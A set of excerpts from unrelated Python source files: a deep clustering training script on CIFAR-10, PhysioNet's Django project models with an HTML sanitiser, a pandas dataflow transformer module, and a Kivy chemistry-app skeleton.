# evaluate clustering performance
pca = PCA(n_components=args.n_clusters)
feats = pca.fit_transform(feats)
kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)
y_pred = kmeans.fit_predict(feats)
acc, nmi, ari = cluster_acc(targets, y_pred), nmi_score(targets, y_pred), ari_score(targets, y_pred)
print('Init acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(acc, nmi, ari))
probs = feat2prob(torch.from_numpy(feats), torch.from_numpy(kmeans.cluster_centers_))
return acc, nmi, ari, kmeans.cluster_centers_, probs
def warmup_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.warmup_lr, momentum=args.momentum, weight_decay=args.weight_decay)
for epoch in range(args.warmup_epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Warmup_train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
args.p_targets = target_distribution(probs)
def Baseline_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def PI_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
w = args.rampup_coefficient * ramps.sigmoid_rampup(epoch, args.rampup_length)
for batch_idx, ((x, x_bar), label, idx) in enumerate(tqdm(train_loader)):
x, x_bar = x.to(device), x_bar.to(device)
feat = model(x)
feat_bar = model(x_bar)
prob = feat2prob(feat, model.center)
prob_bar = feat2prob(feat_bar, model.center)
sharp_loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
consistency_loss = F.mse_loss(prob, prob_bar)
loss = sharp_loss + w * consistency_loss
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def TE_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
alpha = 0.6
ntrain = len(train_loader.dataset)
Z = torch.zeros(ntrain, args.n_clusters).float().to(device) # intermediate values
z_ema = torch.zeros(ntrain, args.n_clusters).float().to(device) # temporal outputs
z_epoch = torch.zeros(ntrain, args.n_clusters).float().to(device) # current outputs
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
w = args.rampup_coefficient * ramps.sigmoid_rampup(epoch, args.rampup_length)
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
z_epoch[idx, :] = prob
prob_bar = Variable(z_ema[idx, :], requires_grad=False)
sharp_loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
consistency_loss = F.mse_loss(prob, prob_bar)
loss = sharp_loss + w * consistency_loss
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
Z = alpha * Z + (1. - alpha) * z_epoch
z_ema = Z * (1. / (1. - alpha ** (epoch + 1)))
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def TEP_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
alpha = 0.6
ntrain = len(train_loader.dataset)
Z = torch.zeros(ntrain, args.n_clusters).float().to(device) # intermediate values
z_bars = torch.zeros(ntrain, args.n_clusters).float().to(device) # temporal outputs
z_epoch = torch.zeros(ntrain, args.n_clusters).float().to(device) # current outputs
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
z_epoch = probs.float().to(device)
Z = alpha * Z + (1. - alpha) * z_epoch
z_bars = Z * (1. / (1. - alpha ** (epoch + 1)))
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(z_bars)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def test(model, test_loader, args):
model.eval()
preds=np.array([])
targets=np.array([])
feats = np.zeros((len(test_loader.dataset), args.n_clusters))
probs= np.zeros((len(test_loader.dataset), args.n_clusters))
for batch_idx, (x, label, idx) in enumerate(tqdm(test_loader)):
x, label = x.to(device), label.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
_, pred = prob.max(1)
targets=np.append(targets, label.cpu().numpy())
preds=np.append(preds, pred.cpu().numpy())
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.cpu().detach().numpy()
probs[idx, :] = prob.cpu().detach().numpy()
acc, nmi, ari = cluster_acc(targets.astype(int), preds.astype(int)), nmi_score(targets, preds), ari_score(targets, preds)
print('Test acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(acc, nmi, ari))
probs = torch.from_numpy(probs)
return acc, nmi, ari, probs
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='cluster',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--warmup_lr', type=float, default=0.1)
parser.add_argument('--lr', type=float, default=0.05)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--weight_decay', type=float, default=1e-4)
parser.add_argument('--warmup_epochs', default=10, type=int)
parser.add_argument('--epochs', default=100, type=int)
parser.add_argument('--rampup_length', default=5, type=int)
parser.add_argument('--rampup_coefficient', type=float, default=10.0)
parser.add_argument('--batch_size', default=128, type=int)
parser.add_argument('--update_interval', default=5, type=int)
parser.add_argument('--n_clusters', default=5, type=int)
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--save_txt', default=False, type=str2bool, help='save txt or not', metavar='BOOL')
parser.add_argument('--pretrain_dir', type=str, default='./data/experiments/pretrained/resnet18_cifar10_classif_5.pth')
parser.add_argument('--dataset_root', type=str, default='./data/datasets/CIFAR/')
parser.add_argument('--exp_root', type=str, default='./data/experiments/')
parser.add_argument('--model_name', type=str, default='resnet18')
parser.add_argument('--save_txt_name', type=str, default='result.txt')
parser.add_argument('--DTC', type=str, default='PI')
args = parser.parse_args()
args.cuda = torch.cuda.is_available()
device = torch.device("cuda" if args.cuda else "cpu")
seed_torch(args.seed)
runner_name = os.path.basename(__file__).split(".")[0]
model_dir= args.exp_root + '{}/{}'.format(runner_name, args.DTC)
if not os.path.exists(model_dir):
os.makedirs(model_dir)
args.model_dir = model_dir+'/'+args.model_name+'.pth'
args.save_txt_path= args.exp_root+ '{}/{}/{}'.format(runner_name, args.DTC, args.save_txt_name)
train_loader = CIFAR10Loader(root=args.dataset_root, batch_size=args.batch_size, split='train', labeled=False, aug='twice', shuffle=True)
eval_loader = CIFAR10Loader(root=args.dataset_root, batch_size=args.batch_size, split='train', labeled=False, aug=None, shuffle=False)
model = ResNet(BasicBlock, [2,2,2,2], 5).to(device)
model.load_state_dict(torch.load(args.pretrain_dir), strict=False)
model.linear= Identity()
init_feat_extractor = model
init_acc, init_nmi, init_ari, init_centers, init_probs = init_prob_kmeans(init_feat_extractor, eval_loader, args)
args.p_targets = target_distribution(init_probs)
model = ResNet(BasicBlock, [2,2,2,2], args.n_clusters).to(device)
model.load_state_dict(init_feat_extractor.state_dict(), strict=False)
model.center= Parameter(torch.Tensor(args.n_clusters, args.n_clusters))
model.center.data | |
<reponame>Lucas-Mc/physionet-build<filename>physionet-django/project/models.py
from datetime import datetime, timedelta
import hashlib
from html import unescape
import os
import shutil
import uuid
import pdb
import pytz
import stat
import logging
from distutils.version import StrictVersion
import bleach
import ckeditor.fields
from html2text import html2text
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.validators import MaxValueValidator, MinValueValidator
from django.contrib.auth.hashers import check_password, make_password
from django.db import models, DatabaseError, transaction
from django.forms.utils import ErrorList
from django.urls import reverse
from django.utils import timezone
from django.utils.html import format_html, strip_tags
from django.utils.text import slugify
from background_task import background
from django.utils.crypto import get_random_string
from project.quota import DemoQuotaManager
from project.utility import (get_tree_size, get_file_info, get_directory_info,
list_items, StorageInfo, list_files,
clear_directory)
from project.validators import (validate_doi, validate_subdir,
validate_version, validate_slug,
MAX_PROJECT_SLUG_LENGTH,
validate_title, validate_topic)
from user.validators import validate_affiliation
from physionet.utility import (sorted_tree_files, zip_dir)
LOGGER = logging.getLogger(__name__)
@background()
def move_files_as_readonly(pid, dir_from, dir_to, make_zip):
"""
Schedule a background task to set the files as read only.
If a file starts with a Shebang, then it will be set as executable.
"""
published_project = PublishedProject.objects.get(id=pid)
published_project.make_checksum_file()
quota = published_project.quota_manager()
published_project.incremental_storage_size = quota.bytes_used
published_project.save(update_fields=['incremental_storage_size'])
published_project.set_storage_info()
# Make the files read only
file_root = published_project.project_file_root()
for root, dirs, files in os.walk(file_root):
for f in files:
fline = open(os.path.join(root, f), 'rb').read(2)
if fline[:2] == b'#!':
os.chmod(os.path.join(root, f), 0o555)
else:
os.chmod(os.path.join(root, f), 0o444)
for d in dirs:
os.chmod(os.path.join(root, d), 0o555)
if make_zip:
published_project.make_zip()
class SafeHTMLField(ckeditor.fields.RichTextField):
"""
An HTML text field that permits only "safe" content.
On the client side, this field is displayed as an interactive
WYSIWYG editor (see ckeditor.fields.RichTextField.)
On the server side, the HTML text is "cleaned" using the bleach
library to ensure that all tags are properly closed, entities are
well-formed, etc., and to remove or escape any unsafe tags or
attributes.
The permitted set of tags and attributes is generated from the
corresponding 'allowedContent' rules in settings.CKEDITOR_CONFIGS
(which also defines the client-side whitelisting rules and the set
of options that are visible to the user.) For example:
'allowedContent': {
'a': {'attributes': ['href']},
'em': True,
'*': {'attributes': ['title']},
}
This would permit the use of 'a' and 'em' tags (all other tags are
forbidden.) 'a' tags are permitted to have an 'href' attribute,
and any tag is permitted to have a 'title' attribute.
NOTE: This class does not use ckeditor's 'disallowedContent'
rules. Those rules can be used to perform tag/attribute
blacklisting on the client side, but will not be enforced on the
server side.
"""
# The following protocols may be used in 'href', 'src', and
# similar attributes.
_protocols = ['http', 'https', 'ftp', 'mailto']
# The following attributes are forbidden on the server side even
# if permitted on client side. (This is a kludge; permitting
# 'width' to be set on the client side makes editing tables
# easier.)
_attribute_blacklist = {('table', 'width')}
# The following CSS properties may be set via inline styles (but
# only on elements for which the 'style' attribute itself is
# permitted.)
_styles = ['text-align']
def __init__(self, config_name='default', strip=False,
strip_comments=True, **kwargs):
super().__init__(config_name=config_name, **kwargs)
conf = settings.CKEDITOR_CONFIGS[config_name]
tags = []
attrs = {}
for (tag, props) in conf['allowedContent'].items():
if tag != '*':
tags.append(tag)
if isinstance(props, dict) and 'attributes' in props:
attrs[tag] = []
for attr in props['attributes']:
if (tag, attr) not in self._attribute_blacklist:
attrs[tag].append(attr)
self._cleaner = bleach.Cleaner(tags=tags, attributes=attrs,
styles=self._styles,
protocols=self._protocols,
strip=strip,
strip_comments=strip_comments)
def clean(self, value, model_instance):
value = self._cleaner.clean(value)
return super().clean(value, model_instance)
class Affiliation(models.Model):
"""
Affiliations belonging to an author
"""
name = models.CharField(max_length=202, validators=[validate_affiliation])
author = models.ForeignKey('project.Author', related_name='affiliations',
on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'author'),)
class PublishedAffiliation(models.Model):
"""
Affiliations belonging to a published author
"""
name = models.CharField(max_length=202, validators=[validate_affiliation])
author = models.ForeignKey('project.PublishedAuthor',
related_name='affiliations', on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'author'),)
class BaseAuthor(models.Model):
"""
Base model for a project's author/creator. Credited for creating the
resource.
Datacite definition: "The main researchers involved in producing the
data, or the authors of the publication, in priority order."
"""
user = models.ForeignKey('user.User', related_name='%(class)ss',
on_delete=models.CASCADE)
display_order = models.PositiveSmallIntegerField()
is_submitting = models.BooleanField(default=False)
is_corresponding = models.BooleanField(default=False)
# When they approved the project for publication
approval_datetime = models.DateTimeField(null=True)
class Meta:
abstract = True
def __str__(self):
# Best representation for form display
user = self.user
return '{} --- {}'.format(user.username, user.email)
class Author(BaseAuthor):
"""
The author model for ArchivedProject/ActiveProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
corresponding_email = models.ForeignKey('user.AssociatedEmail', null=True,
on_delete=models.SET_NULL)
creation_date = models.DateTimeField(default=timezone.now)
class Meta:
unique_together = (('user', 'content_type', 'object_id',),
('display_order', 'content_type', 'object_id'))
def get_full_name(self, reverse=False):
"""
The name is tied to the profile. There is no form for authors
to change their names. Return the full name.
Args:
reverse: Format of the return string. If False (default) then
'firstnames lastname'. If True then 'lastname, firstnames'.
"""
last = self.user.profile.last_name
first = self.user.profile.first_names
if reverse:
return ', '.join([last, first])
else:
return ' '.join([first, last])
def initialed_name(self, commas=True, periods=True):
"""
Return author's name in citation style.
"""
last = self.user.profile.last_name
first = self.user.profile.first_names
final_string = '{}, {}'.format(
last, ' '.join('{}.'.format(i[0]) for i in first.split()))
if not commas:
final_string = final_string.replace(',', '')
if not periods:
final_string = final_string.replace('.', '')
return final_string
def disp_name_email(self):
"""
"""
return '{} ({})'.format(self.get_full_name(), self.user.email)
def import_profile_info(self):
"""
Import profile information (names) into the Author object.
Also create affiliation object if present in profile.
"""
profile = self.user.profile
if profile.affiliation:
Affiliation.objects.create(name=profile.affiliation,
author=self)
return True
return False
def set_display_info(self, set_affiliations=True):
"""
Set the fields used to display the author
"""
user = self.user
self.name = user.profile.get_full_name()
self.email = user.email
self.username = user.username
if set_affiliations:
self.text_affiliations = [a.name for a in self.affiliations.all()]
class PublishedAuthor(BaseAuthor):
"""
The author model for PublishedProject
"""
first_names = models.CharField(max_length=100, default='')
last_name = models.CharField(max_length=50, default='')
corresponding_email = models.EmailField(null=True)
project = models.ForeignKey('project.PublishedProject',
related_name='authors', db_index=True, on_delete=models.CASCADE)
class Meta:
unique_together = (('user', 'project'),
('display_order', 'project'))
def get_full_name(self, reverse=False):
"""
Return the full name.
Args:
reverse: Format of the return string. If False (default) then
'firstnames lastname'. If True then 'lastname, firstnames'.
"""
if reverse:
return ', '.join([self.last_name, self.first_names])
else:
return ' '.join([self.first_names, self.last_name])
def set_display_info(self):
"""
Set the fields used to display the author
"""
self.name = self.get_full_name()
self.username = self.user.username
self.email = self.user.email
self.text_affiliations = [a.name for a in self.affiliations.all()]
def initialed_name(self, commas=True, periods=True):
final_string = '{}, {}'.format(self.last_name, ' '.join('{}.'
.format(i[0]) for i in self.first_names
.split()))
if not commas:
final_string = final_string.replace(',', '')
if not periods:
final_string = final_string.replace('.', '')
return final_string
class Topic(models.Model):
"""
Topic information to tag ActiveProject/ArchivedProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
description = models.CharField(max_length=50, validators=[validate_topic])
class Meta:
unique_together = (('description', 'content_type', 'object_id'),)
def __str__(self):
return self.description
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedTopic(models.Model):
"""
Topic information to tag PublishedProject
"""
projects = models.ManyToManyField('project.PublishedProject',
related_name='topics')
description = models.CharField(max_length=50, validators=[validate_topic])
project_count = models.PositiveIntegerField(default=0)
def __str__(self):
return self.description
class Reference(models.Model):
"""
Reference field for ActiveProject/ArchivedProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
description = models.CharField(max_length=1000)
class Meta:
unique_together = (('description', 'content_type', 'object_id'),)
def __str__(self):
return self.description
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedReference(models.Model):
"""
"""
description = models.CharField(max_length=1000)
project = models.ForeignKey('project.PublishedProject',
related_name='references', on_delete=models.CASCADE)
class Meta:
unique_together = (('description', 'project'))
class Contact(models.Model):
"""
Contact for a PublishedProject
"""
name = models.CharField(max_length=120)
affiliations = models.CharField(max_length=150)
email = models.EmailField(max_length=255)
project = models.OneToOneField('project.PublishedProject',
related_name='contact', on_delete=models.CASCADE)
class BasePublication(models.Model):
"""
Base model for the publication to cite when referencing the
resource
"""
citation = models.CharField(max_length=1000)
url = models.URLField(blank=True, default='')
class Meta:
abstract = True
class Publication(BasePublication):
"""
Publication for ArchivedProject/ActiveProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedPublication(BasePublication):
"""
Publication for published project
"""
project = models.ForeignKey('project.PublishedProject',
db_index=True, related_name='publications', on_delete=models.CASCADE)
class CoreProject(models.Model):
"""
The core underlying object that links all versions of the project in
its various states
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
creation_datetime = models.DateTimeField(auto_now_add=True)
# doi pointing to the latest version of the published project
doi = models.CharField(max_length=50, blank=True, null=True)
# Maximum allowed storage capacity in bytes.
# Default = 100Mb. Max = 10Tb
storage_allowance = models.BigIntegerField(default=104857600,
validators=[MaxValueValidator(109951162777600),
MinValueValidator(104857600)])
def active_new_version(self):
"Whether | |
<reponame>ajmal017/amp
import collections
import datetime
import inspect
import logging
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
import pandas as pd
import core.dataflow.nodes.base as cdnb
import core.dataflow.utils as cdu
import core.finance as cfinan
import core.signal_processing as csigna
import helpers.dbg as dbg
_LOG = logging.getLogger(__name__)
# TODO(*): Create a dataflow types file.
_COL_TYPE = Union[int, str]
_PANDAS_DATE_TYPE = Union[str, pd.Timestamp, datetime.datetime]
_RESAMPLING_RULE_TYPE = Union[pd.DateOffset, pd.Timedelta, str]
class ColumnTransformer(cdnb.Transformer, cdnb.ColModeMixin):
"""
Perform non-index modifying changes of columns.
"""
def __init__(
self,
nid: str,
transformer_func: Callable[..., pd.DataFrame],
transformer_kwargs: Optional[Dict[str, Any]] = None,
# TODO(Paul): May need to assume `List` instead.
cols: Optional[Iterable[str]] = None,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: unique node id
:param transformer_func: df -> df
- The keyword `info` (if present) means that:
- An empty dict is passed in to this `info`
- The resulting (populated) dict is included in the node's
`_info`
:param transformer_kwargs: `transformer_func` kwargs
:param cols: columns to transform; `None` defaults to all available.
:param col_rename_func: function for naming transformed columns, e.g.,
`lambda x: "zscore_" + x`
:param col_mode: determines what columns are propagated by the node.
Same values as in `apply_col_mode()`.
:param nan_mode: determines how to handle NaNs
- `leave_unchanged` (default): do not process NaNs
- `drop`: it applies to all columns simultaneously.
"""
super().__init__(nid)
if cols is not None:
dbg.dassert_isinstance(cols, list)
self._cols = cols
self._col_rename_func = col_rename_func
self._col_mode = col_mode
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
# Store the list of columns after the transformation.
self._transformed_col_names = None
self._nan_mode = nan_mode or "leave_unchanged"
# State of the object. This is set by derived classes.
self._fit_cols = cols
@property
def transformed_col_names(self) -> List[str]:
dbg.dassert_is_not(
self._transformed_col_names,
None,
"No transformed column names. This may indicate "
"an invocation prior to graph execution.",
)
return self._transformed_col_names
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
df_in = df.copy()
df = df.copy()
if self._fit_cols is None:
self._fit_cols = df.columns.tolist() or self._cols
if self._cols is None:
dbg.dassert_set_eq(self._fit_cols, df.columns)
df = df[self._fit_cols]
# Handle NaNs.
idx = df.index
if self._nan_mode == "leave_unchanged":
pass
elif self._nan_mode == "drop":
df = df.dropna()
else:
raise ValueError(f"Unrecognized `nan_mode` {self._nan_mode}")
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
# Perform the column transformation operations.
# Introspect to see whether `_transformer_func` contains an `info`
# parameter. If so, inject an empty dict to be populated when
# `_transformer_func` is executed.
func_sig = inspect.signature(self._transformer_func)
if "info" in func_sig.parameters:
func_info = collections.OrderedDict()
df = self._transformer_func(
df, info=func_info, **self._transformer_kwargs
)
info["func_info"] = func_info
else:
df = self._transformer_func(df, **self._transformer_kwargs)
# Reindex df to align it with the original data.
df = df.reindex(index=idx)
# TODO(Paul): Consider supporting the option of relaxing or foregoing this
# check.
dbg.dassert(
df.index.equals(df_in.index),
"Input/output indices differ but are expected to be the same!",
)
# Maybe merge transformed columns with a subset of input df columns.
df = self._apply_col_mode(
df_in,
df,
cols=self._fit_cols,
col_rename_func=self._col_rename_func,
col_mode=self._col_mode,
)
# Update `info`.
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
class SeriesTransformer(cdnb.Transformer, cdnb.ColModeMixin):
"""
Perform non-index modifying changes of columns.
TODO(*): Factor out code common with `SeriesToSeriesTransformer`.
"""
def __init__(
self,
nid: str,
transformer_func: Callable[..., pd.DataFrame],
transformer_kwargs: Optional[Dict[str, Any]] = None,
# TODO(Paul): May need to assume `List` instead.
cols: Optional[Iterable[Union[int, str]]] = None,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: unique node id
:param transformer_func: srs -> df. The keyword `info` (if present) is
assumed to have a specific semantic meaning. If present,
- An empty dict is passed in to this `info`
- The resulting (populated) dict is included in the node's
`_info`
:param transformer_kwargs: transformer_func kwargs
:param cols: columns to transform; `None` defaults to all available.
:param col_rename_func: function for naming transformed columns, e.g.,
lambda x: "zscore_" + x
:param col_mode: `merge_all`, `replace_selected`, or `replace_all`.
Determines what columns are propagated by the node.
:param nan_mode: `leave_unchanged` or `drop`. If `drop`, applies to
columns individually.
"""
super().__init__(nid)
if cols is not None:
dbg.dassert_isinstance(cols, list)
self._cols = cols
self._col_rename_func = col_rename_func
self._col_mode = col_mode
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
# Store the list of columns after the transformation.
self._transformed_col_names = None
self._nan_mode = nan_mode or "leave_unchanged"
self._fit_cols = cols
@property
def transformed_col_names(self) -> List[str]:
dbg.dassert_is_not(
self._transformed_col_names,
None,
"No transformed column names. This may indicate "
"an invocation prior to graph execution.",
)
return self._transformed_col_names
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
df_in = df.copy()
df = df.copy()
if self._fit_cols is None:
self._fit_cols = df.columns.tolist() or self._cols
if self._cols is None:
dbg.dassert_set_eq(self._fit_cols, df.columns)
df = df[self._fit_cols]
idx = df.index
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
info["func_info"] = collections.OrderedDict()
func_info = info["func_info"]
srs_list = []
for col in self._leaf_cols:
srs, col_info = _apply_func_to_series(
df[col],
self._nan_mode,
self._transformer_func,
self._transformer_kwargs,
)
dbg.dassert_isinstance(srs, pd.Series)
srs.name = col
if col_info is not None:
func_info[col] = col_info
srs_list.append(srs)
info["func_info"] = func_info
df = pd.concat(srs_list, axis=1)
df = df.reindex(index=idx)
# TODO(Paul): Consider supporting the option of relaxing or
# foregoing this check.
dbg.dassert(
df.index.equals(df_in.index),
"Input/output indices differ but are expected to be the same!",
)
# Maybe merge transformed columns with a subset of input df columns.
df = self._apply_col_mode(
df_in,
df,
cols=df.columns.tolist(),
col_rename_func=None,
col_mode=self._col_mode,
)
#
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
class SeriesToDfTransformer(cdnb.Transformer):
"""
Wrap transformers using the `SeriesToDfColProcessor` pattern.
"""
def __init__(
self,
nid: str,
in_col_group: Tuple[_COL_TYPE],
out_col_group: Tuple[_COL_TYPE],
transformer_func: Callable[..., pd.Series],
transformer_kwargs: Optional[Dict[str, Any]] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
For reference, let:
- N = df.columns.nlevels
- leaf_cols = df[in_col_group].columns
:param nid: unique node id
:param in_col_group: a group of cols specified by the first N - 1
levels
:param out_col_group: new output col group names. This specifies the
names of the first N - 1 levels. The leaf_cols names remain the
same.
:param transformer_func: srs -> srs
:param transformer_kwargs: transformer_func kwargs
:param nan_mode: `leave_unchanged` or `drop`. If `drop`, applies to
columns individually.
"""
super().__init__(nid)
dbg.dassert_isinstance(in_col_group, tuple)
dbg.dassert_isinstance(out_col_group, tuple)
self._in_col_group = in_col_group
self._out_col_group = out_col_group
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
self._nan_mode = nan_mode or "leave_unchanged"
# The leaf col names are determined from the dataframe at runtime.
self._leaf_cols = None
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
# Preprocess to extract relevant flat dataframe.
df_in = df.copy()
df = cdnb.SeriesToDfColProcessor.preprocess(df, self._in_col_group)
# Apply `transform()` function column-wise.
self._leaf_cols = df.columns.tolist()
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
info["func_info"] = collections.OrderedDict()
func_info = info["func_info"]
dfs = {}
for col in self._leaf_cols:
df_out, col_info = _apply_func_to_series(
df[col],
self._nan_mode,
self._transformer_func,
self._transformer_kwargs,
)
dbg.dassert_isinstance(df_out, pd.DataFrame)
if col_info is not None:
func_info[col] = col_info
dfs[col] = df_out
info["func_info"] = func_info
# Combine the series representing leaf col transformations back into a
# single dataframe.
df = cdnb.SeriesToDfColProcessor.postprocess(dfs, self._out_col_group)
df = cdu.merge_dataframes(df_in, df)
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
class SeriesToSeriesTransformer(cdnb.Transformer):
"""
Wrap transformers using the `SeriesToSeriesColProcessor` pattern.
When operating on multiple columns, this applies the transformer function
one series at a time. Additionally, NaN-handling is performed "locally"
(one series at a time, without regard to NaNs in other columns).
Example: df like
close vol
MN0 MN1 MN2 MN3 MN0 MN1 MN2 MN3
2010-01-04 10:30:00 -2.62 8.81 14.93 -0.88 100.0 100.0 100.0 100.0
2010-01-04 11:00:00 -2.09 8.27 16.75 -0.92 100.0 100.0 100.0 100.0
2010-01-04 11:30:00 -2.52 6.97 12.56 -1.52 100.0 100.0 100.0 100.0
2010-01-04 12:00:00 -2.54 5.30 8.90 -1.54 100.0 100.0 100.0 100.0
2010-01-04 12:30:00 -1.91 2.02 4.65 -1.77 100.0 100.0 100.0 100.0
Then, e.g., to calculate, returns, we could take
- `in_col_group = "close",`
- `out_col_group = "ret_0",`
Notice that the trailing comma makes these tuples.
The transformer_func and `nan_mode` would operate on the price columns
individually and return one return column per price column, e.g.,
generating
ret_0 close vol
MN0 | |
<filename>ActualApp/Wireframe/main.py
from DataStorage import Authentication, Database
from kivy.app import App
from kivy.lang.builder import Builder
from kivy.uix.screenmanager import Screen, NoTransition
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.core.text.markup import MarkupLabel
from kivy.core.window import Window
from kivy.core.text import LabelBase
import json
import Elements as elements
# all of the screens
class Login(Screen):
pass
class ForgotPassword(Screen):
pass
class SignupStudentOrTeacher(Screen):
pass
class SignupStudent(Screen):
pass
class SignupTeacher(Screen):
pass
class HomePageStudent(Screen):
pass
class HomePageStudentMolarTab(Screen):
pass
class HomePageTeacher(Screen):
pass
class SearchElement(Screen):
pass
class BalancingEquations(Screen):
pass
class MolarCalculator(Screen):
pass
class AcidBase(Screen):
pass
class CalculateFormula(Screen):
pass
class LewisStructure(Screen):
pass
# Some Helpful Methods
def process_error_message(error_message):
error_message = error_message.split("_")
return_message = ""
for message in error_message:
return_message += message.capitalize() + " "
return return_message
